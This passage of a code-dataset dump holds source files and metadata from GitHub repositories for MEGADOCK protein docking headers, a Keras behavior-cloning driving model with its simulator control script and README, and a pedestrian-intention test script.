"C++", "length_bytes": 1646, "license_type": "permissive", "max_line_length": 85, "num_lines": 58, "path": "/megadock-scfa20/docking_pdb.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : DockingPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef DockingPDB_h\n#define DockingPDB_h 1\n\n#include \"docking.h\"\n#include \"cpu_time.h\"\n#include \"parameter_pdb.h\"\n#include \"fft_process_pdb.h\"\n\nusing namespace std;\n\nclass DockingPDB : public Docking<ParameterPDB, FFTProcessPDB>\n{\nprivate:\n CPUTime *_cputime;\n float **_Mol_coord;\nprotected:\n virtual void maxsize_voxel();\n virtual void alloc_array(const int &maxatom, const int &nag, const size_t &ng3);\n virtual void create_voxel(Protein<ParameterPDB> *rprotein, size_t myid2);\n virtual void ligand_rotationz(float *theta, size_t myid2);\npublic:\n DockingPDB(CPUTime *pcputime,Parallel *pparallel,ParameterPDB *pparameter,\n Receptor<ParameterPDB> *rreceptor,Ligand<ParameterPDB> *rligand)\n : _cputime(pcputime),Docking(pparallel,pparameter,rreceptor,rligand) {\n#ifdef DEBUG\n cout << \"Constructing DockingPDB.\\n\";\n#endif\n }\n virtual ~DockingPDB() {\n#ifdef DEBUG\n cout << \"Destructing DockingPDB.\\n\";\n#endif\n delete [] _Mol_coord;\n }\n virtual void initialize();\n virtual void rec_init();\n virtual void dockz();\n virtual void dock_memory_free();\n virtual void output();\n virtual void output_detail(); // for analysis\n virtual void output_calc_time_log(); // for analysis\n};\n\n#endif\n" }, { "alpha_fraction": 0.6201799511909485, "alphanum_fraction": 0.6233932971954346, "avg_line_length": 24.933332443237305, "blob_id": "23632c9c44bdce5990c9560156555ebe72662d41", "content_id": "dd683267077e5371368550e071f3ec5fbcd2964e", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1556, "license_type": "permissive", "max_line_length": 98, "num_lines": 60, "path": "/megadock-scfa20/control_table.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ControlTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef ControlTable_h\n#define ControlTable_h 1\n\n#include \"control.h\"\n#include \"exec_logger.h\"\n#include \"parameter_table.h\"\n#include \"docking_table.h\"\n\nusing namespace std;\n\nclass ControlTable : public Control<ParameterTable, DockingTable>\n{\nprivate:\n ExecLogger *_exec_logger;\nprotected:\n virtual void autogridr(const int &ngrid,vector<int> &ngrid_table);\n virtual void autogridl(const int &ngrid,vector<int> &ngrid_table);\n virtual void checkgridr();\n virtual void checkgridl();\npublic:\n ControlTable(ExecLogger *pexec_logger,Parallel *pparallel,ParameterTable *pparameter)\n : _exec_logger(pexec_logger),Control<ParameterTable, DockingTable>(pparallel,pparameter) {\n#ifdef DEBUG\n cout << \"Constructing ControlTable.\\n\";\n#endif\n }\n virtual ~ControlTable() {\n#ifdef DEBUG\n cout << \"Destructing ControlTable.\\n\";\n#endif\n }\n virtual void initialize(bool verbose);\n#ifdef MPI_DP\n virtual void prepare();\n#else\n virtual void prepare(string rec_file, string lig_file, string out_file);\n#endif\n virtual void execute();\n#ifndef MPI_DP\n virtual string input_file() {\n return _parameter->_Table_file;\n }\n#endif\n};\n\n#endif\n" } ]
31
mathieu-wang/carnd-behavior-cloning
https://github.com/mathieu-wang/carnd-behavior-cloning
3dc408800c1df95daf82076d9b0197077f2a0d52
7d6ef5b2f2e43fbebfc6f438c6f492f1fc1d83d8
c74e8f44c074ceb342659f66c4df6bffe8f7a6fb
refs/heads/master
2021-01-25T05:56:37.263900
2017-02-02T09:29:09
2017-02-02T09:29:09
80,706,153
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6599479913711548, "alphanum_fraction": 0.6807542443275452, "avg_line_length": 29.465347290039062, "blob_id": "13f6e75746b3089ba1006082655335f5e4960652", "content_id": "e02bd9020190b97148944b14810734b7e7c46147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3076, "license_type": "no_license", "max_line_length": 125, "num_lines": 101, "path": "/drive.py", "repo_name": "mathieu-wang/carnd-behavior-cloning", "src_encoding": "UTF-8", "text": "import argparse\nimport base64\nimport json\n\nimport numpy as np\nimport socketio\nimport eventlet\nimport eventlet.wsgi\nimport time\nfrom PIL import Image\nfrom PIL import ImageOps\nfrom flask import Flask, render_template\nfrom io import BytesIO\n\nfrom keras.models import model_from_json\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array\nimport cv2\n\n# Fix error with Keras and TensorFlow\nimport tensorflow as tf\ntf.python.control_flow_ops = tf\n\n\nsio = socketio.Server()\napp = Flask(__name__)\nmodel = None\nprev_image_array = None\n\[email protected]('telemetry')\ndef telemetry(sid, data):\n #print(data)\n # The current steering angle of the car\n steering_angle = data[\"steering_angle\"]\n # The current throttle of the car\n throttle = data[\"throttle\"]\n # The current speed of the car\n speed = data[\"speed\"]\n # The current image from the center camera of the car\n imgString = data[\"image\"]\n image = Image.open(BytesIO(base64.b64decode(imgString)))\n image_array = np.asarray(image)\n\n #image_array = sp.imresize(image_array, size=shape, interp='cubic')\n image_array = preprocess(image_array)\n\n transformed_image_array = image_array[None, :, :, :]\n steering_angle = float(model.predict(transformed_image_array, batch_size=1)) * 2 # double angle to have enough correction\n\n # Set the throttle according to current speed and steering angles.\n # Gradually slow down as steering angle increases\n if float(speed) > 15.0: # Max speed of 15\n throttle = 0\n elif float(speed) < 5.0: # Min speed of 5\n throttle = 0.1\n elif 0.05 <= abs(steering_angle) < 0.10:\n throttle = -0.1\n elif 0.10 <= abs(steering_angle) < 0.2:\n throttle = -0.2\n elif 0.2 <= abs(steering_angle):\n throttle = -0.4\n else:\n throttle = 0.2\n print(steering_angle, throttle)\n send_control(steering_angle, throttle)\n\n\[email protected]('connect')\ndef connect(sid, environ):\n print(\"connect \", sid)\n send_control(0, 0)\n\n\ndef send_control(steering_angle, throttle):\n sio.emit(\"steer\", data={\n 'steering_angle': steering_angle.__str__(),\n 'throttle': throttle.__str__()\n }, skip_sid=True)\n\n# Preprocessing (same as in model.py)\ndef preprocess(image, width=200, height=66):\n processed = image[60:130, 0:320]\n processed = cv2.resize(processed, (width, height), interpolation = cv2.INTER_CUBIC)\n return processed\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Remote Driving')\n parser.add_argument('model', type=str,\n help='Path to model definition json. Model weights should be on the same path.')\n args = parser.parse_args()\n with open(args.model, 'r') as jfile:\n model = model_from_json(json.loads(jfile.read()))\n\n model.compile(\"adam\", \"mse\")\n weights_file = args.model.replace('json', 'h5')\n model.load_weights(weights_file)\n\n # wrap Flask application with engineio's middleware\n app = socketio.Middleware(sio, app)\n\n # deploy as an eventlet WSGI server\n eventlet.wsgi.server(eventlet.listen(('', 4567)), app)" }, { "alpha_fraction": 0.7891566157341003, "alphanum_fraction": 0.8039156794548035, "avg_line_length": 173.73684692382812, "blob_id": "cd36775e2211e0c1405442294155045f0d77975b", "content_id": "4c6102bd137924480d52ca298caebe102bfd724c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3320, "license_type": "no_license", "max_line_length": 953, "num_lines": 19, "path": "/README.md", "repo_name": "mathieu-wang/carnd-behavior-cloning", "src_encoding": "UTF-8", "text": "# carnd-behavior-cloning\n\n# Architecture\nThis project uses the architecture designed by NVIDIA's self-driving car team and documented in http://images.nvidia.com/content/tegra/automotive/images/2016/solutions/pdf/end-to-end-dl-using-px.pdf.\nThe inputs consist of 66x200 RGB images, which are first normalized, then passed through 5 convolutional layers and 3 fully connected layers to finally produce a single float value representing the steering angle.\nIn order to prevent overfitting, a dropout layer of 0.5 is used after each convolutional layer.\n\n# Approach to Problem\nBefore implementing the solution pipeline, some analysis work had been done to better understand the data and to prepare for debugging the pipeline and model later on.\nFirst, the CSV file containing the Udacity-provided training data was read and organized in different lists with the same indexing for easier access. The data was then validated by counting the number of elements in each of the properties' array, and making sure they have the same length. A total of 8036 training records was found.\nThen, 3 data records were chosen to be anaylized. One was a left turn, one was a snapshot of the car going straight, and the third was a right turn. The images and their corresponding steering angles (one negative, one zero, and one positive) were visualized, which made possible the design of the preprocessing algorithm: crop the top and bottom parts of the images, and resize to 66x200 to use them as inputs to the model.\nFinally, using the 3 test images and their steering angles, the pipeline was developed and debugged, and a full model was trained.\nThe training is done through a generator, which select one index at random in the original training records, and generates 6 images with their corresponding steering angles: the left, center, and right camera images with steering corrections, as well as the symmetries of the 3 images with respect to the vertical axis. For the training itself, a total of 8000 x 6 = 48000 samples were used. Since the generator chooses an index at random, the 48000 samples (8000 indices) will not cover all training records, and will use some of them more than once. However, for model training purposes, this is a good enough approach. This also make sure that the data is shuffled between each of the 5 training epochs. For the training step, an Adam optimizer with mean squared error metric were used. Note that no validation set was created because the accuracy is not meaningful in this case, and the only real measurement of accuracy is testing in the simulator.\n\n# Testing and Results\nIn order to test the model in the simulator, the drive.py script had to be slightly modified.\nFirst, the same preprocessing steps are applied to the image from telemetry.\nThen, the predicted steering angle was used, along with the current speed of the vehicle to adjust the throttle and steering angle of the car. Maximum and minimum speeds of 15 and 5 mi/hr were selected to balance between lap time and handling. Also, the throttle is controlled such that the car would slow down when the steering angle is large in either direction (a turn), and accelerate when the angle is small (straight line).\nUsing the model and pipeline described above, the car is able to run multiple laps in a row in the simulator.\n" }, { "alpha_fraction": 0.682503879070282, "alphanum_fraction": 0.7037924528121948, "avg_line_length": 29.174468994140625, "blob_id": "09449c3f91aff4ca9afad51c1ca1d531e410e25c", "content_id": "a2c31d9e14772436d9ac7209649f003f60a8ff56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7093, "license_type": "no_license", "max_line_length": 129, "num_lines": 235, "path": "/model.py", "repo_name": "mathieu-wang/carnd-behavior-cloning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[13]:\n\n# imports\nimport csv\nimport tensorflow as tf\nimport keras\nimport keras.backend.tensorflow_backend as KTF\nimport cv2\nimport numpy as np\n\n\n\n# In[14]:\n\nspeed = []\nthrottle = []\nleft = []\ncenter = []\nright = []\nsteering = []\n\n# Load driving log:\nwith open('data/driving_log.csv') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n speed.append(float(row['speed']))\n throttle.append(float(row['throttle']))\n left.append(row['left'])\n center.append(row['center'])\n right.append(row['right'])\n steering.append(float(row['steering']))\n\n\n# In[15]:\n\n# Make sure the data is loaded correctly\nassert len(speed) == len(throttle) == len(left) == len(center) == len(right) == len(steering)\nprint(len(speed))\n\n\n# In[16]:\n\n# Preprocessing\ndef preprocess(image, width=200, height=66):\n processed = image[60:130, 0:320]\n processed = cv2.resize(processed, (width, height), interpolation = cv2.INTER_CUBIC)\n return processed\n\n\n# In[17]:\n\n# Build Keras model according to the NVIDIA paper\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers.normalization import BatchNormalization\n\nbatch_size = 100\nepochs = 5\nmodel = Sequential()\nmodel.add(BatchNormalization(input_shape=(66, 200, 3), axis=1))\nmodel.add(Convolution2D(24, 5, 5, border_mode='valid', subsample = (2,2), input_shape=(66,200,3)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Convolution2D(36, 5, 5, border_mode='valid', subsample = (2,2)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Convolution2D(48, 5, 5, border_mode='valid', subsample = (2,2)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Convolution2D(64, 3, 3, border_mode='valid', subsample = (1,1)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Convolution2D(64, 3, 3, border_mode='valid', subsample = (1,1)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Activation('relu'))\nmodel.add(Dense(50))\nmodel.add(Activation('relu'))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\nmodel.summary()\n\n# Configures the learning process and metrics\nmodel.compile('adam', 'mean_squared_error', ['accuracy'])\n\n\n# In[18]:\n\n# Test model with a few sample images\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n# Find 3 test images: big left turn, straight run, and big right turn\nleft_turn_image_idx = 0\nstraight_image_idx = 0\nright_turn_image_idx = 0\n\nfor i in range(len(steering)):\n angle = steering[i]\n if angle < -0.4:\n left_turn_image_idx = i\n elif angle == 0:\n straight_image_idx = i\n elif angle > 0.4:\n right_turn_image_idx = i\n \nprint(steering[left_turn_image_idx], steering[straight_image_idx], steering[right_turn_image_idx])\n\nleft_turn_image_c=mpimg.imread(\"data/\"+center[left_turn_image_idx].strip())\n\nprint(left_turn_image_c.shape)\n\n\nplt.imshow(left_turn_image_c)\nplt.title(\"Original Left Turn Image. Steering angle = {}\".format(steering[left_turn_image_idx]))\nplt.show()\n\nstraight_image_c=mpimg.imread(\"data/\"+center[straight_image_idx].strip())\nplt.imshow(straight_image_c)\nplt.title(\"Original Straight Image. Steering angle = {}\".format(steering[straight_image_idx]))\nplt.show()\n\nright_turn_image_c=mpimg.imread(\"data/\"+center[right_turn_image_idx].strip())\nplt.imshow(right_turn_image_c)\nplt.title(\"Original Right Turn Image. Steering angle = {}\".format(steering[right_turn_image_idx]))\nplt.show()\n\nleft_turn_image_c_processed = preprocess(left_turn_image_c)\nplt.imshow(left_turn_image_c_processed)\nplt.title(\"Processed Left Turn Image. Steering angle = {}\".format(steering[left_turn_image_idx]))\nplt.show()\n\nstraight_image_c_processed = preprocess(straight_image_c)\nplt.imshow(straight_image_c_processed)\nplt.title(\"Processed Straight Image. Steering angle = {}\".format(steering[straight_image_idx]))\nplt.show()\n\nright_turn_image_c_processed = preprocess(right_turn_image_c)\nplt.imshow(right_turn_image_c_processed)\nplt.title(\"Processed Right Turn Image. Steering angle = {}\".format(steering[right_turn_image_idx]))\nplt.show()\n\n\n# In[19]:\n\n# Run test images through model\n\nx_train_data = np.array([left_turn_image_c_processed, straight_image_c_processed, right_turn_image_c_processed])\nY_train_data = np.array([steering[left_turn_image_idx], steering[straight_image_idx], steering[right_turn_image_idx]])\n\nprint((3,) + x_train_data[0].shape)\n# print(Y_train_data)\n\nhistory = model.fit(x_train_data, Y_train_data, batch_size=1, nb_epoch=5)\n\n# Calculate test score\ntest_score = model.evaluate(x_train_data, Y_train_data)\n\nprint(test_score)\nprint(model.predict(x_train_data))\n\n\n# In[21]:\n\nimport matplotlib.image as mpimg\n\n# Generate additional data using left, right and flipped images\n# 1) Choose a random index from all existing training images (~8000)\n# 2) Generate 6 images and their corresponding steering angles using the left and right camera images with a steering correction,\n# as well as the symmetries of the 3 images with respect to the vertical axis\ndef generate_data():\n while True:\n idx = randint(0, len(center)-1)\n\n cimg = preprocess(mpimg.imread(\"data/\"+center[idx].strip()))\n limg = preprocess(mpimg.imread(\"data/\"+left[idx].strip()))\n rimg = preprocess(mpimg.imread(\"data/\"+right[idx].strip()))\n cflipped = cv2.flip(cimg,1)\n lflipped = cv2.flip(limg,1)\n rflipped = cv2.flip(rimg,1)\n\n generated_images = np.array([cimg, limg, rimg, cflipped, lflipped, rflipped])\n\n steering_correction = 0.25\n\n csteering = steering[idx]\n lsteering = csteering + steering_correction\n rsteering = csteering - steering_correction\n csflipped = -csteering\n lsflipped = -lsteering\n rsflipped = -rsteering\n\n generated_steerings = np.array([csteering, lsteering, rsteering, csflipped, lsflipped, rsflipped])\n\n yield generated_images, generated_steerings \n\n\n# In[22]:\n\n# Run test images through model\nfrom random import randint\n\nx_train_data = np.array([left_turn_image_c_processed, straight_image_c_processed, right_turn_image_c_processed])\nY_train_data = np.array([steering[left_turn_image_idx], steering[straight_image_idx], steering[right_turn_image_idx]])\n\nmodel.fit_generator(generate_data(), \n samples_per_epoch=48000, # approximately len(center)*6, which should cover most images in training set\n nb_epoch=5,\n verbose=2)\n\n# Calculate test score\ntest_score = model.evaluate(x_train_data, Y_train_data)\nprint(test_score)\n# The test score is only to give an idea about the accuracy.\n# The performance of the model can only be shown in the simulator\n\nprint(model.predict(x_train_data))\n\n\n# In[23]:\n\n# Save model and weights\nimport json\n\njson_str = model.to_json()\nwith open('model.json','w') as f:\n json.dump(json_str, f)\n\nmodel.save_weights('model.h5')\n\n" } ]
3
robinsonweng/PCR_web_crawler
https://github.com/robinsonweng/PCR_web_crawler
5ec763990f3f0c8fcc32b263a78094b985be1ef5
7fb50359dc6cd3334e90a83b79143c27d290880c
d0da070871eccae1c79fce34848cb36fa2e0ddd7
refs/heads/master
2020-09-18T20:30:02.165770
2020-06-09T05:39:06
2020-06-09T05:39:06
224,179,804
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7961783409118652, "alphanum_fraction": 0.8025477528572083, "avg_line_length": 18.625, "blob_id": "d1241c88ccc6842c7c86139be5404cc76e75788a", "content_id": "6afc3999a0b956b0733c6667059309e582ace1bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 157, "license_type": "no_license", "max_line_length": 80, "num_lines": 8, "path": "/README.md", "repo_name": "robinsonweng/PCR_web_crawler", "src_encoding": "UTF-8", "text": "# PRC_web_crawler\n\nCrawling PrincessConnect:Redive charactors information into json using webdriver\n\n## Requirement\n- Selenuim\n- Beautiful soup 4\n- requests\n" }, { "alpha_fraction": 0.5629629492759705, "alphanum_fraction": 0.5774193406105042, "avg_line_length": 38.047847747802734, "blob_id": "70e14054c487fefd03c857fdb2dc231330a89f81", "content_id": "6de992aa72956d3c01e25e47127fd11bbc5b3fe4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8698, "license_type": "no_license", "max_line_length": 143, "num_lines": 209, "path": "/craw.py", "repo_name": "robinsonweng/PCR_web_crawler", "src_encoding": "UTF-8", "text": "#抓入https://pcredivewiki.tw/ 的檔案\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport asyncio, re, time, requests, json, io, colorama\r\n\r\n\r\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}\r\n\r\ndef home_event():\r\n try:\r\n event_link = \"https://pcredivewiki.tw/static/data/event.json\"\r\n event_json = requests.get(event_link)\r\n except:\r\n print(\"error from request: {}\".format(event_json))\r\n\r\n raw_json = json.loads(event_json.text)\r\n sorted_json = json.dumps(raw_json, indent=4, sort_keys=True, ensure_ascii=False)\r\n\r\n eventdatafile = open(\"datafile/event.json\", \"w\",encoding='utf-8')\r\n eventdatafile.write(json.dumps(json.loads(sorted_json), indent=4, sort_keys=True, ensure_ascii=False))\r\n eventdatafile.close()\r\n \r\ndef character():\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"\")#--headless\r\n browser = webdriver.Chrome(chrome_options=chrome_options)\r\n browser.get(\"https://pcredivewiki.tw/Character\")\r\n html = browser.page_source\r\n htmlbs4 = BeautifulSoup(html, \"lxml\")\r\n\r\n #find name\r\n character_name = []\r\n for name in htmlbs4.find_all('small'):\r\n character_name.append(name.get_text())\r\n \r\n #find link\r\n character_link = []\r\n for link in htmlbs4.find_all('a'):\r\n if \"/Character/Detial/\" in link.get('href'):\r\n character_link.append(link.get('href'))\r\n \r\n #find picture path\r\n character_imgpath = []\r\n for path in htmlbs4.find_all('img', src=True, class_=True):\r\n if \"/static/images/unit/\" in path.get('src'):\r\n character_imgpath.append(path.get('src'))\r\n\r\n if len(character_imgpath) == len(character_link) == len(character_name):\r\n print(\"compare done!\")\r\n else:\r\n print(\"error! character info not complete!\")\r\n \r\n data = {}\r\n index = 0\r\n for name in character_name:\r\n data[name] = [\"{}\".format(character_imgpath[index]),\"{}\".format(character_link[index])]\r\n index+=1\r\n\r\n character_nav = open(\"datafile/character_nav.json\", \"w\", encoding='utf8')\r\n character_nav.write(json.dumps(data, indent=4, sort_keys=True, ensure_ascii=False))\r\n character_nav.close()\r\n\r\ndef character_info(character_link):\r\n \"\"\"\r\n The output shoud be:\r\n {\r\n \"document\":{\r\n \"name\": none,\r\n \"birthday\": none,\r\n \"age\": none,\r\n \"height\": none,\r\n \"weight\": none,\r\n \"bloodtype\": none,\r\n \"raise\": none,\r\n \"hobby\": none,\r\n \"CV\": none,\r\n \"intro\": none\r\n },\r\n \"skill\": {\r\n \"name\": [\r\n \"ぷうきちサンタ・ストーム\",\r\n \"ぷうきちエール\",\r\n \"ぷうきちラッシュ\",\r\n \"ホーリーナイトスラッガー\",\r\n \"ホーリーナイトスラッガー+\"\r\n ],\r\n \"startup\": [\r\n \"/static/images/skill/icon_skill_ap01.png\",\r\n \"/static/images/skill/icon_skill_ap02.png\"\r\n ],\r\n \"loop\": [\r\n \"/static/images/skill/icon_skill_attack.png\",\r\n \"/static/images/skill/icon_skill_ap01.png\",\r\n \"/static/images/skill/icon_skill_ap02.png\"\r\n ],\r\n \"info\": [\r\n \"敵単体に【80.0 + 80.0*技能等級 + 7.4 *atk】の物理ダメージ\",\r\n \"自分の物理攻撃力を【22.0 + 22.0*技能等級 】アップ\\n\\n持續時間: 10.0 秒\",\r\n \"敵単体に【12.0 + 12.0*技能等級 + 1.0 *atk】の物理ダメージ\",\r\n \"自分の物理攻撃力を【15.0 + 15.0*技能等級 】アップ\",\r\n \"自分の物理攻撃力を【240.0 + 15.0*技能等級 】アップ\"\r\n ]\r\n },\r\n \"specialitem\": {\r\n \"name\": null\r\n \"intro\": null\r\n \"status\": null\r\n }\r\n }\r\n \"\"\"\r\n #for loop\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--headless\")\r\n browser = webdriver.Chrome(chrome_options=chrome_options)\r\n browser.get(character_link)\r\n html = browser.page_source\r\n htmlbs4 = BeautifulSoup(html, \"lxml\")\r\n #個人資料\r\n character_doc = [text.get_text() for text in htmlbs4.find_all('td')]\r\n character_key = [\"name\", \"birthday\", \"age\", \"hight\", \"weight\", \"bloodtype\", \"raise\", \"hobby\", \"CV\"]\r\n character_dict = dict(zip(character_key, character_doc))\r\n #special item:\r\n item_ = [item for item in htmlbs4.find_all('div', class_=\"prod-info-box unique mb-3\")]\r\n if item_:\r\n specialitem_name = {\"name\":[name.find('h2').get_text() for name in item_][0]}\r\n specialitem_intro = {\"intro\":[intro.find('p').get_text() for intro in item_][0]}\r\n specialiteminfo = []\r\n for item in item_:\r\n for info in item.find_all('span', class_=True):\r\n specialiteminfo.append(info.get_text().strip())\r\n specialitem_status = {\"status\":specialiteminfo}\r\n\r\n skinfo = htmlbs4.find_all('div', class_=\"skill-box my-3\")\r\n skillinfo = []\r\n skill_name = {\"name\":[info.find('h3').get_text() for info in skinfo]}\r\n for info in skinfo:\r\n info.find('h3').decompose()\r\n info.find('div', class_=re.compile(r\"skill-type\\smb-1\\s\\w+\")).decompose()\r\n skillinfo.append(info.get_text().replace(\"\\t\", \"\"))\r\n skill_info = {\"info\":skillinfo}\r\n \r\n else:\r\n skinfo = htmlbs4.find_all('div', class_=\"skill-box my-3\")\r\n skill_info = {\"info\":[info.find('div', class_=\"mb-3\").get_text().strip().replace(\"\\t\", \"\").replace(\"\\r\", \"\") for info in skinfo]}\r\n skill_name = {\"name\":[info.find('h3').get_text() for info in skinfo]}\r\n specialitem_name = {\"name\":None}\r\n specialitem_intro = {\"intro\":None}\r\n specialitem_status = {\"status\":None}\r\n\r\n #intro:\r\n character_dict['intro'] = [htmlbs4.find('span', class_=\"my-3 d-block\").get_text().replace(\"簡介\", \"\").strip()][0]\r\n #document:\r\n document = {\"document\":character_dict}\r\n\r\n startup_skill = {\"startup\":[path.get('src') for path in htmlbs4.find('div', class_=\"d-flex flex-wrap\").find_all('img')]}\r\n \r\n loop_ = [path for path in htmlbs4.find_all('div', class_=\"d-flex flex-wrap\")][1]\r\n loop_skill = {\"loop\":[path.get('src') for path in loop_.find_all('img')]}\r\n #skill\r\n #skill = {\"skill\":{skill_name, startup_skill, loop_skill, skill_info}}\r\n skill_name.update(startup_skill)\r\n skill_name.update(loop_skill)\r\n skill_name.update(skill_info)\r\n skill = {\"skill\": skill_name} \r\n #specialitem\r\n specialitem_name.update(specialitem_intro)\r\n specialitem_name.update(specialitem_status)\r\n specialitem = {\"specialitem\": specialitem_name}\r\n #combine document skill specialitem\r\n #output = {f'{character_doc[0]}':dict(zip(document, skill, specialitem))}\r\n document.update(skill)\r\n document.update(specialitem)\r\n output = {f'{character_doc[0]}': document}\r\n \r\n #convert dict into json\r\n #print(json.dumps(output, indent=4, sort_keys=True, ensure_ascii=False))\r\n return output\r\n\r\ndef writedatafile():\r\n \"\"\"read character name, link\"\"\"\r\n\r\n #name, character and picture link\r\n with open(\"datafile/character_nav.json\", \"r\", encoding='utf-8') as f:\r\n character_load = json.load(f)\r\n link = \"https://pcredivewiki.tw/Character/Detial/\"\r\n home = \"https://pcredivewiki.tw\"\r\n character_list = list(character_load.keys())\r\n character_detaillink = [f'{link}{name}' for name in character_list]\r\n\r\n index = 0\r\n for name in character_list:\r\n character_dict = character_info(character_detaillink[index])\r\n #character_datafile io\r\n with open(\"datafile/character_datafile.json\", \"r\", encoding='utf-8') as f:\r\n character_prev = json.load(f)\r\n character_link = {\"link\": f'{home}{character_load[name][1]}'}\r\n character_icon = {\"icon\": f'{home}{character_load[name][0]}'}\r\n character_dict[name].update(character_icon)\r\n character_dict[name].update(character_link)\r\n print(json.dumps(character_dict, indent=4, sort_keys=True, ensure_ascii=False))\r\n\r\n with open(\"datafile/character_datafile.json\", \"w+\", encoding='utf-8') as f:\r\n character_prev.update(character_dict)\r\n json.dump(character_prev, f, indent=4, sort_keys=True, ensure_ascii=False)\r\n print(colorama.Fore.RED + f'INFO: 已經完成{name}的腳色檔案\\n')\r\n index +=1\r\n\r\nwritedatafile()\r\n" } ]
2
dschoerk/Pedestrian_Crossing_Intention_Prediction
https://github.com/dschoerk/Pedestrian_Crossing_Intention_Prediction
90caee4d709dccf8e3fa5022450b5674205f151b
046a75e1c2a623c66ac95e410c5304a4d0732ee2
c0964b69a9ed900fdf330e0b5e889ba0d89ea26e
refs/heads/main
2023-04-26T09:42:38.914654
2021-05-28T15:41:31
2021-05-28T15:41:31
371,746,200
0
0
MIT
2021-05-28T15:35:46
2021-05-25T19:33:12
2021-05-23T09:41:57
null
[ { "alpha_fraction": 0.6552567481994629, "alphanum_fraction": 0.6596577167510986, "avg_line_length": 38.346153259277344, "blob_id": "aa89149bd2f0cf3e048e35138afffe8f92f50b8e", "content_id": "7ed8052c75bfdf22ff521e621734b89ebe2a81ba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2045, "license_type": "permissive", "max_line_length": 94, "num_lines": 52, "path": "/test.py", "repo_name": "dschoerk/Pedestrian_Crossing_Intention_Prediction", "src_encoding": "UTF-8", "text": "from action_predict import action_prediction\n# from pie_data import PIE\nfrom jaad_data import JAAD\nimport os\nimport sys\nimport yaml\nimport tensorflow as tf\ngpus = tf.config.experimental.list_physical_devices('GPU')\nassert len(gpus) > 0, \"Not enough GPU hardware devices available\"\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n tf.config.experimental.set_virtual_device_configuration(\n gpu,\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=4096)]\n )\n\ndef test_model(saved_files_path=None):\n\n with open(os.path.join(saved_files_path, 'configs.yaml'), 'r') as yamlfile:\n opts = yaml.safe_load(yamlfile)\n print(opts)\n model_opts = opts['model_opts']\n data_opts = opts['data_opts']\n net_opts = opts['net_opts']\n\n tte = model_opts['time_to_event'] if isinstance(model_opts['time_to_event'], int) else \\\n model_opts['time_to_event'][1]\n data_opts['min_track_size'] = model_opts['obs_length'] + tte\n\n if model_opts['dataset'] == 'pie':\n pass\n # imdb = PIE(data_path=os.environ.copy()['PIE_PATH'])\n # imdb.get_data_stats()\n elif model_opts['dataset'] == 'jaad':\n # imdb = JAAD(data_path=os.environ.copy()['JAAD_PATH'])\n imdb = JAAD(data_path='/home/haolin/CITR/PedestrianActionBenchmark/JAAD/')\n else:\n raise ValueError(\"{} dataset is incorrect\".format(model_opts['dataset']))\n\n method_class = action_prediction(model_opts['model'])(**net_opts)\n #beh_seq_train = imdb.generate_data_trajectory_sequence('train', **data_opts)\n #saved_files_path = method_class.train(beh_seq_train, **train_opts, model_opts=model_opts)\n\n beh_seq_test = imdb.generate_data_trajectory_sequence('test', **data_opts)\n acc, auc, f1, precision, recall = method_class.test(beh_seq_test, saved_files_path)\n print('test done')\n print(acc, auc, f1, precision, recall)\n\n\nif __name__ == '__main__':\n saved_files_path = sys.argv[1]\n test_model(saved_files_path=saved_files_path)" }, { "alpha_fraction": 0.708108127117157, "alphanum_fraction": 0.7359886169433594, "avg_line_length": 38.05555725097656, "blob_id": "31f836acb58b796c95b564ce904053f085ee3cb8", "content_id": "c406ba5f2b67b372e9f1439797321217f39a3e09", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3515, "license_type": "permissive", "max_line_length": 399, 